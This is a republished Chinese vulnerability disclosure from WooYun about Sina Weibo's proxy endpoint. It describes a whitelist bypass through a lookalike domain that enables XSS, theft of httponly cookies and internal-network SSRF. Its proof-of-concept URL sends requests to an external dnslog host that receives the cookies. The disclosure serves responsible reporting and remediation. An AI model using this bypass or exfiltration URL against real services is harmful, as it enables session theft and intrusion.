神刀安全网

漏洞标题: 新浪微博某漏洞修复不当可XSS/盗取用户httponly cookie

漏洞详情

披露状态:

2016-04-02: 细节已通知厂商并且等待厂商处理中
2016-04-06: 厂商已经确认,细节仅向厂商公开
2016-04-16: 细节向核心白帽子及相关领域专家公开
2016-04-26: 细节向普通白帽子公开
2016-05-06: 细节向实习白帽子公开
2016-05-21: 细节向公众公开

简要描述:

RT.

详细说明:

code 区域
http://www.weibo.com/p/aj/proxy?api=url

见 @呆子不开口 之前发的 WooYun: 微博上你点我的链接我就可xss你并可拿到httponly的cookie及其他危害

官方修复了之后, http:[email protected]/wb.php之类的url已经不行了,但使用http://contentrecommend.mobile.sina.cn.fakedomain.com 这样的url可以绕过白名单限制。

此处可以ssrf探测内网的,刚开始的时候还支持302跳转的,但测着测着就发现不行了,可能被发现然后修复了。虽然不能跳转了,但我们可以自己搭建个简易dns服务器,动态返回内网的ip,这样任可以扫描内网。

漏洞证明:

code 区域
http://www.weibo.com/p/aj/proxy?api=http://contentrecommend.mobile.sina.cn.****.dnslog.info/

cloudeye 收到的请求:

漏洞标题:  新浪微博某漏洞修复不当可XSS/盗取用户httponly cookie

cookies全送过来了。

修复方案:

完善白名单规则

版权声明:转载请注明来源 loopx9@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 新浪微博某漏洞修复不当可XSS/盗取用户httponly cookie

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址